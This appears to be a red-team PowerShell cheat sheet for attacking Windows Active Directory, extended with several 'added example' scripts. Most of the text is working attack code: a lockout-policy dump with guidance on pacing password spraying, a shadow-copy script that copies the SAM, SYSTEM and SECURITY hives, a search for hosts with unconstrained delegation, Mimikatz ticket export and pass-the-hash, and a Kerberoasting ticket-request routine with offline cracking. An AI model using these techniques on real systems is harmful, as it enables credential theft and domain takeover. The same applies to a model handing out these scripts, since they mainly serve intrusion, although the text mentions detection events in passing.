Powershell * RED TEAM SECURITY

Information Gathering – Active Directory

List the classes exposed by the WMI LDAP provider:

PS C:\Windows\system32> Get-WmiObject -Namespace root\directory\ldap -List
PS C:\Windows\system32> Get-CimClass -Namespace root\directory\ldap

Get the current domain (either command returns the name of the domain the box is joined to):

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-WmiObject -Namespace root/directory/ldap -Class ds_domain | select -ExpandProperty ds_dc
PS C:\Windows\system32> (Get-WmiObject -Class win32_computersystem).domain

Get the current domain policy (the lockout threshold and observation window tell you how many guesses per account you can afford before password spraying starts locking users out):

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-WmiObject -Namespace root/directory/ldap -Class ds_domain | select DS_lockoutDuration, DS_lockoutObservationWindow, DS_lockoutThreshold,…
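The raw ds_domain values are awkward to read: the interval attributes come back as negative 100-nanosecond tick counts, and "never expires" is encoded as the most negative 64-bit integer. The following is an added example (not code from the original post) that reads the same class and turns the policy into something you can act on before spraying; it assumes nothing beyond a domain-joined host that can reach a DC.

```powershell
# Added example: dump the domain password/lockout policy via the WMI LDAP provider
# (root\directory\ldap, class ds_domain) and convert AD interval values into readable units.
function Convert-AdInterval {
    param([Parameter(Mandatory)] $Value)
    # AD stores durations as negative 100-ns intervals; Int64.MinValue means "never".
    $ticks = [int64]$Value
    if ($ticks -eq 0 -or $ticks -eq [int64]::MinValue) { return 'never / not set' }
    return [TimeSpan]::FromTicks([math]::Abs($ticks)).ToString()
}

function Get-DomainPasswordPolicy {
    $domain = Get-WmiObject -Namespace root\directory\ldap -Class ds_domain | Select-Object -First 1
    if (-not $domain) { throw 'ds_domain query returned nothing; is this host domain-joined with line of sight to a DC?' }

    [pscustomobject]@{
        Domain                   = $domain.DS_dc
        LockoutThreshold         = $domain.DS_lockoutThreshold        # 0 = accounts never lock out
        LockoutDuration          = Convert-AdInterval $domain.DS_lockoutDuration
        LockoutObservationWindow = Convert-AdInterval $domain.DS_lockOutObservationWindow
        MaxPasswordAge           = Convert-AdInterval $domain.DS_maxPwdAge
        MinPasswordAge           = Convert-AdInterval $domain.DS_minPwdAge
        MinPasswordLength        = $domain.DS_minPwdLength
        PasswordHistoryLength    = $domain.DS_pwdHistoryLength
        ComplexityRequired       = [bool]($domain.DS_pwdProperties -band 1)   # DOMAIN_PASSWORD_COMPLEX flag
    }
}

Get-DomainPasswordPolicy | Format-List
```

A threshold of 0 means spraying is unconstrained; otherwise keep the number of attempts per account at threshold minus one within each observation window, then wait for the window to reset before the next round. Fine-grained password policies (PSOs) are not reflected in ds_domain, so privileged accounts may be stricter than this shows.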

Powershell * WMI

Red Team WMI

Enumerate the local box through WMI:

PS C:\> Get-WmiObject -Class win32_IP4RouteTable
PS C:\> Get-WmiObject -Class win32_useraccount
PS C:\> Get-WmiObject -Class win32_group
PS C:\> Get-WmiObject -Class win32_shadowcopy

Create a volume shadow copy of C: and expose it through a directory symbolic link (local admin required). Files that are locked on the live volume, such as the SAM and SYSTEM hives or ntds.dit on a domain controller, can be copied out of the snapshot:

PS C:\> (Get-WmiObject -Class win32_shadowcopy -List).create("c:\","ClientAccessible")
PS C:\> $link = (Get-WmiObject -Class win32_shadowcopy).deviceobject + "\"
PS C:\> cmd /c mklink /d c:\shadowcopy "$link"

The $link line assumes this is the only shadow copy on the box; if others already exist, DeviceObject comes back as an array and you have to select the snapshot by its ID. The trailing backslash on the device path is required for mklink to resolve the volume.

Gather information from the local box with Invoke-SessionGopher.ps1 (Nishang, Gather folder):

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> . .\Invoke-SessionGopher.ps1…
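The three shadow-copy commands above are the whole technique, but run as written they leave a snapshot and a symlink on disk and break when more than one shadow copy exists. Below is an added example, not code from the original post, that does the same thing end to end: it selects the snapshot by the ShadowID that Create() returns, copies the locked hives out, and cleans up. The link path and output directory are assumptions; change them to suit.

```powershell
# Added example: snapshot C:, symlink the snapshot, copy locked hives, then clean up.
# Needs local admin. Selecting by ShadowID keeps this working when other snapshots exist.
$ErrorActionPreference = 'Stop'
$linkPath = 'C:\shadowcopy'       # assumption: a path that does not exist yet
$outDir   = "$env:TEMP\hives"     # assumption: staging directory for the copied files

$result = (Get-WmiObject -Class Win32_ShadowCopy -List).Create('C:\', 'ClientAccessible')
if ($result.ReturnValue -ne 0) { throw "Win32_ShadowCopy.Create failed with code $($result.ReturnValue)" }

# Fetch exactly the snapshot we just made, not whatever happens to be first in the list
$shadow = Get-WmiObject -Class Win32_ShadowCopy -Filter "ID='$($result.ShadowID)'"
$device = $shadow.DeviceObject + '\'   # e.g. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\
cmd /c mklink /d $linkPath "$device" | Out-Null

try {
    New-Item -ItemType Directory -Path $outDir -Force | Out-Null
    # These hives are locked by the kernel on the live volume but readable in the snapshot
    foreach ($hive in 'SAM', 'SYSTEM', 'SECURITY') {
        Copy-Item -Path (Join-Path $linkPath "Windows\System32\config\$hive") -Destination $outDir
    }
    # On a domain controller the same trick yields the directory database:
    # Copy-Item (Join-Path $linkPath 'Windows\NTDS\ntds.dit') $outDir
    Get-ChildItem $outDir
}
finally {
    # rmdir removes the link itself, not its target; Delete() drops the snapshot
    cmd /c rmdir $linkPath | Out-Null
    $shadow.Delete()
}
```

Shadow copy creation is logged (VSS events and, with Sysmon, the WMI method call), so defenders looking for Win32_ShadowCopy creation from PowerShell rather than from backup software will spot this; cleaning up does not remove those events.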

Powershell * POWERSHELL SECURITY

Privesc Kerberos

Discover domain computers which have unconstrained delegation enabled, using PowerView:

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer -Unconstrained

Using the Active Directory module, filter on the TrustedForDelegation flag instead (for computers and for user accounts):

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADComputer -Filter {TrustedForDelegation -eq $true}
PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Filter {trustedfordelegation -eq $true}

Domain controllers are trusted for unconstrained delegation by default, so the interesting hits are member servers. Once you have administrative access on such a host, check whether a domain admin has authenticated to it and left a forwarded TGT in memory:

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command '"sekurlsa::tickets"'
PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator…
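PowerView and the AD module are not always available on the box you land on, and both commands above list domain controllers alongside the member servers you actually care about. The following is an added example, not part of the original post, that does the same enumeration with .NET ADSI only: TRUSTED_FOR_DELEGATION is bit 0x80000 (524288) of userAccountControl, and the LDAP bitwise-AND matching rule 1.2.840.113556.1.4.803 lets the DC evaluate it server-side. The function name is my own.

```powershell
# Added example: enumerate unconstrained-delegation computers via ADSI, filtering out DCs.
function Get-UnconstrainedDelegationComputer {
    param([switch]$IncludeDomainControllers)

    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    # objectCategory=computer plus userAccountControl & 0x80000 (TRUSTED_FOR_DELEGATION)
    $searcher.Filter   = '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))'
    $searcher.PageSize = 1000
    foreach ($p in 'dnshostname', 'operatingsystem', 'primarygroupid') {
        [void]$searcher.PropertiesToLoad.Add($p)
    }

    foreach ($r in $searcher.FindAll()) {
        $pgid = $r.Properties['primarygroupid'] | Select-Object -First 1
        $isDc = ($pgid -eq 516)   # 516 = Domain Controllers primary group
        # DCs are trusted for delegation by design; member servers are the real targets,
        # because compromising one lets you harvest the TGTs that users forward to it.
        if ($isDc -and -not $IncludeDomainControllers) { continue }
        [pscustomobject]@{
            HostName = $r.Properties['dnshostname']    | Select-Object -First 1
            OS       = $r.Properties['operatingsystem'] | Select-Object -First 1
            IsDC     = $isDc
        }
    }
}

Get-UnconstrainedDelegationComputer | Format-Table -AutoSize
```

The query runs as the current domain user and needs no special rights, since userAccountControl is readable by any authenticated principal. Pass -IncludeDomainControllers to see the full list if you want to confirm the filter is doing what you expect.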

Powershell * POWERSHELL SECURITY

Domain Privesc

Find user accounts used as service accounts, i.e. user objects with a servicePrincipalName set, using the AD module loaded straight from the ADModule repository:

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Import-Module .\ActiveDirectory.psd1
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Get-ADUser -Filter {serviceprincipalname -ne "$null"} -Properties serviceprincipalname

Check that the TGS for the target SPN has been granted and is sitting in the ticket cache:

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> klist

Export all tickets using Mimikatz:

PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"kerberos::list /export"'

Crack the exported TGS offline with tgsrepcrack.py (https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py):

PS C:\Users\victim.SECURITY\Downloads\kerberoast-master\kerberoast-master> python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt .\2-40a50000-victim@ldap~WIN-2RUMVG5JPOC.security.local~security.local-SECURITY.LOCAL.kirbi…
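The excerpt jumps from finding SPNs to checking klist, leaving out the step that actually gets the service tickets into the cache. The block below is an added example, not code from the original post, that fills that gap with nothing but .NET: it enumerates user accounts with an SPN through the [adsisearcher] accelerator, requests a service ticket for each SPN via System.IdentityModel.Tokens.KerberosRequestorSecurityToken (the KDC issues the TGS as soon as the token is constructed; nothing is ever sent to the service), and then hands off to klist. Everything here runs as an ordinary domain user.

```powershell
# Added example: the Kerberoast request step (SPN discovery + TGS request) that precedes
# "klist" and "kerberos::list /export" in the post.
Add-Type -AssemblyName System.IdentityModel

# samAccountType 805306368 = user objects. krbtgt is excluded: its TGS is encrypted with
# the KDC key and cannot be cracked offline, so requesting it is just noise.
$searcher = [adsisearcher]'(&(samAccountType=805306368)(servicePrincipalName=*)(!(samAccountName=krbtgt)))'
$searcher.PageSize = 1000
[void]$searcher.PropertiesToLoad.AddRange(@('samaccountname', 'serviceprincipalname', 'pwdlastset'))

function Request-ServiceTickets {
    foreach ($acct in $searcher.FindAll()) {
        $name    = $acct.Properties['samaccountname'] | Select-Object -First 1
        $pwdSet  = $acct.Properties['pwdlastset']     | Select-Object -First 1
        foreach ($spn in $acct.Properties['serviceprincipalname']) {
            try {
                # Constructing the token triggers an AS/TGS exchange; the ticket lands in the
                # session cache where klist and Mimikatz can see it.
                $null   = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn
                $status = 'ticket cached'
            }
            catch { $status = "failed: $($_.Exception.Message)" }
            [pscustomobject]@{
                Account    = $name
                # Old passwords on service accounts are the ones most likely to crack
                PwdLastSet = [datetime]::FromFileTime([int64]$pwdSet)
                SPN        = $spn
                Status     = $status
            }
        }
    }
}

Request-ServiceTickets | Format-Table -AutoSize
klist   # the requested service tickets now appear here, ready for kerberos::list /export
```

Two caveats worth knowing before you run tgsrepcrack.py over the result: the script cracks RC4-HMAC (etype 23) tickets only, so accounts whose msDS-SupportedEncryptionTypes forces AES will export tickets it cannot handle, and every request above lands in the DC security log as event 4769, which is exactly what detection rules for Kerberoasting key on (one client requesting many SPNs, RC4 encryption, in a short window).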